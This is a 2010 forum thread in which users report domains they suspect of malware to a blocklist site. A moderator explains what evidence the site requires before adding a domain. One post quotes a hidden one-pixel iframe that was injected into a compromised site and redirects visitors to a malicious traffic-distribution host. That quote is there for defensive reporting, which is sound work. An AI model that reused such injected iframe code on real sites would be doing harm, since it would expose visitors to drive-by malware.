Author Topic: Domains Not In Malware Domain List (Read 5124 times)

izzy.rose · August 06, 2010, 03:05:26 am

hxxp://www.hdtvxvid.net/ - Fake Codec
hxxp://www.madsexxx.com/ - Malware/Porn Site
hxxp://www.playcontact.com/ - Fake Codec
hxxp://www.ezthemes.com/ - Malware Distributor
hxxp://www.information.com/ - Fake Search Engine (Opens Up Fake Links To Malware Sites)
hxxp://www.aaathemes.com/ - Malware Distributor
hxxp://www.imgfarm.com/ - Adware/Spyware Distributor
...And that's about it.

Mofaya · August 17, 2010, 01:58:39 pm

Can some one please check this one out to please ?? its been up for a few months now that i know of because its the second time i bumped into it .

the domain is jamaican-slang.com

Thank you very much all admins i love the site very much

.

SysAdMini · August 17, 2010, 02:18:12 pm

If you can provide complete urls which point to malicious content, then we will check them.

We never add simply domain names and claim that there is "something". It has to be clear and provable what's wrong with a site.
Investigating sites is very time consuming. It saves us a lot of time if you provide as much details as you can , for example
VirusTotal, Wepawet or JsUnpack reports.

Mofaya · August 17, 2010, 03:03:31 pm

Yes sorry about that .

Ok im a total noob at this but from the looks of it the site has been comprimised.
Here is the wepawet analyses report
http://wepawet.iseclab.org/view.php?hash=1799f721a44f89ce84d6e5485287a27f&t=1282053697&type=js

The first thing that caught my eye was
<iframe src='hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=http%3A%2F%2Fwww.jamaican-slang.com%2F&parameter=$ke
yword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.jamaican-slang.com%2F&default_keyword=notdefine'
width=1 height=1 border=0 frameborder=0></iframe>

After googling itsallbreaksoft.net i bumped into this
http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/

itsallbreaksoft.net is currently down.
I think this is the reason why my anti virus blocked the site for being infected with iframe trojan.

PS Sorry for my bad english .

SysAdMini · August 17, 2010, 07:25:18 pm

Quote from: Mofaya on August 17, 2010, 03:03:31 pm

Yes sorry about that .

Ok im a total noob at this but from the looks of it the site has been comprimised.
Here is the wepawet analyses report
http://wepawet.iseclab.org/view.php?hash=1799f721a44f89ce84d6e5485287a27f&t=1282053697&type=js

The first thing that caught my eye was
<iframe src='hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=http%3A%2F%2Fwww.jamaican-slang.com%2F&parameter=$ke
yword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.jamaican-slang.com%2F&default_keyword=notdefine'
width=1 height=1 border=0 frameborder=0></iframe>

After googling itsallbreaksoft.net i bumped into this
http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/

itsallbreaksoft.net is currently down.
I think this is the reason why my anti virus blocked the site for being infected with iframe trojan.

PS Sorry for my bad english .

Thanks. Any additional information about an url helps alot.

hxxp://www.jamaican-slang.com/ contains an obfuscated script which directs to hxxp://itsallbreaksoft.net/tds/in.cgi?3.
itsallbreaksoft.net is offline.

Author Topic: Domains Not In Malware Domain List (Read 5124 times)

izzy.rose

Domains Not In Malware Domain List

Mofaya

Re: Domains Not In Malware Domain List

SysAdMini

Re: Domains Not In Malware Domain List

Mofaya

Re: Domains Not In Malware Domain List

SysAdMini

Re: Domains Not In Malware Domain List